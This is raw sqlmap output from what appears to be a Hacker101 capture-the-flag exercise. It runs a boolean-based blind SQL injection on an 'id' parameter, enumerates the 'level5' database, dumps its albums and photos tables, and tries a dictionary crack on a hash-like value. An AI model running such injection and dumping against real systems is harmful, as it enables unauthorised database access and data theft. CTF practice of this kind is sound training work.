        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:05:32 /2025-09-21/

[18:05:32] [INFO] resuming back-end DBMS 'mysql' 
[18:05:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3026=3026
---
[18:05:35] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.27.1.2
back-end DBMS: MySQL 5 (MariaDB fork)
[18:05:35] [INFO] fetching database names
[18:05:35] [INFO] fetching number of databases
[18:05:35] [INFO] resumed: 4
[18:05:35] [INFO] retrieving the length of query output
[18:05:35] [INFO] retrieved: 18
[18:06:18] [INFO] retrieved: information_schema             
[18:06:18] [INFO] retrieving the length of query output
[18:06:18] [INFO] retrieved: 6
[18:06:40] [INFO] retrieved: level5           
[18:06:40] [INFO] retrieving the length of query output
[18:06:40] [INFO] retrieved: 5
[18:06:59] [INFO] retrieved: mysql           
[18:06:59] [INFO] retrieving the length of query output
[18:06:59] [INFO] retrieved: 18
[18:07:45] [INFO] retrieved: performance_schema             
available databases [4]:
[*] information_schema
[*] level5
[*] mysql
[*] performance_schema

[18:07:45] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[18:07:45] [INFO] fetching current database
[18:07:45] [INFO] retrieving the length of query output
[18:07:45] [INFO] retrieved: 6
[18:07:53] [INFO] resumed: level5
[18:07:53] [INFO] fetching tables for database: 'level5'
[18:07:53] [INFO] fetching number of tables for database 'level5'
[18:07:53] [INFO] resumed: 2
[18:07:53] [INFO] retrieving the length of query output
[18:07:53] [INFO] retrieved: 6
[18:08:02] [INFO] resumed: albums
[18:08:02] [INFO] retrieving the length of query output
[18:08:02] [INFO] retrieved: 6
[18:08:10] [INFO] resumed: photos
[18:08:10] [INFO] fetching columns for table 'albums' in database 'level5'
[18:08:10] [INFO] resumed: 2
[18:08:10] [INFO] retrieving the length of query output
[18:08:10] [INFO] retrieved: 2
[18:08:18] [INFO] resumed: id
[18:08:18] [INFO] retrieving the length of query output
[18:08:18] [INFO] retrieved: 5
[18:08:25] [INFO] resumed: title
[18:08:25] [INFO] fetching entries for table 'albums' in database 'level5'
[18:08:25] [INFO] fetching number of entries for table 'albums' in database 'level5'
[18:08:25] [INFO] resumed: 1
[18:08:25] [INFO] retrieving the length of query output
[18:08:25] [INFO] retrieved: 1
[18:08:30] [INFO] resumed: 1
[18:08:30] [INFO] retrieving the length of query output
[18:08:30] [INFO] retrieved: 7
[18:08:37] [INFO] resuming partial value: Kit
[18:08:51] [INFO] retrieved: Kittens        
Database: level5
Table: albums
[1 entry]
+----+---------+
| id | title   |
+----+---------+
| 1  | Kittens |
+----+---------+

[18:08:51] [INFO] table 'level5.albums' dumped to CSV file '/home/Aymen/.local/share/sqlmap/output/046c91288a81ec5ebd2238c74260f4fa.ctf.hacker101.com/dump/level5/albums.csv'
[18:08:51] [INFO] fetching columns for table 'photos' in database 'level5'
[18:08:51] [INFO] retrieved: 4
[18:08:55] [INFO] retrieving the length of query output
[18:08:55] [INFO] retrieved: 2
[18:09:12] [INFO] retrieved: id           
[18:09:12] [INFO] retrieving the length of query output
[18:09:12] [INFO] retrieved: 5
[18:09:33] [INFO] retrieved: title           
[18:09:33] [INFO] retrieving the length of query output
[18:09:33] [INFO] retrieved: 8
[18:09:57] [INFO] retrieved: filename           
[18:09:57] [INFO] retrieving the length of query output
[18:09:57] [INFO] retrieved: 6
[18:10:20] [INFO] retrieved: parent           
[18:10:20] [INFO] fetching entries for table 'photos' in database 'level5'
[18:10:20] [INFO] fetching number of entries for table 'photos' in database 'level5'
[18:10:20] [INFO] retrieved: 3
[18:10:28] [INFO] retrieving the length of query output
[18:10:28] [INFO] retrieved: 18
[18:11:13] [INFO] retrieved: files/adorable.jpg             
[18:11:13] [INFO] retrieving the length of query output
[18:11:13] [INFO] retrieved: 1
[18:11:18] [INFO] retrieved: 1
[18:11:26] [INFO] retrieving the length of query output
[18:11:26] [INFO] retrieved: 1
[18:11:32] [INFO] retrieved: 1
[18:11:40] [INFO] retrieving the length of query output
[18:11:40] [INFO] retrieved: 16
[18:12:22] [INFO] retrieved: Utterly adorable             
[18:12:22] [INFO] retrieving the length of query output
[18:12:22] [INFO] retrieved: 18
[18:13:05] [INFO] retrieved: files/purrfect.jpg             
[18:13:05] [INFO] retrieving the length of query output
[18:13:05] [INFO] retrieved: 1
[18:13:09] [INFO] retrieved: 2
[18:13:18] [INFO] retrieving the length of query output
[18:13:18] [INFO] retrieved: 1
[18:13:23] [INFO] retrieved: 1
[18:13:31] [INFO] retrieving the length of query output
[18:13:31] [INFO] retrieved: 8
[18:13:57] [INFO] retrieved: Purrfect           
[18:13:57] [INFO] retrieving the length of query output
[18:13:57] [INFO] retrieved: 64
[18:16:10] [INFO] retrieved: 2584e3c12ecc3742809d483b1c376127fbe4e79a5379492210a71ce125302e55             
[18:16:10] [INFO] retrieving the length of query output
[18:16:10] [INFO] retrieved: 1
[18:16:15] [INFO] retrieved: 3
[18:16:24] [INFO] retrieving the length of query output
[18:16:24] [INFO] retrieved: 1
[18:16:30] [INFO] retrieved: 1
[18:16:38] [INFO] retrieving the length of query output
[18:16:38] [INFO] retrieved: 9
[18:17:04] [INFO] retrieved: Invisible           
[18:17:04] [INFO] recognized possible password hashes in column 'filename'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[18:17:04] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/opt/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:17:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[18:17:04] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[18:17:04] [INFO] starting 8 processes 
[18:17:11] [WARNING] no clear password(s) found                                                                                            
Database: level5
Table: photos
[3 entries]
+----+------------------+--------+------------------------------------------------------------------+
| id | title            | parent | filename                                                         |
+----+------------------+--------+------------------------------------------------------------------+
| 1  | Utterly adorable | 1      | files/adorable.jpg                                               |
| 2  | Purrfect         | 1      | files/purrfect.jpg                                               |
| 3  | Invisible        | 1      | 2584e3c12ecc3742809d483b1c376127fbe4e79a5379492210a71ce125302e55 |
+----+------------------+--------+------------------------------------------------------------------+

[18:17:11] [INFO] table 'level5.photos' dumped to CSV file '/home/Aymen/.local/share/sqlmap/output/046c91288a81ec5ebd2238c74260f4fa.ctf.hacker101.com/dump/level5/photos.csv'
[18:17:11] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 884 times
[18:17:11] [INFO] fetched data logged to text files under '/home/Aymen/.local/share/sqlmap/output/046c91288a81ec5ebd2238c74260f4fa.ctf.hacker101.com'

[*] ending @ 18:17:11 /2025-09-21/
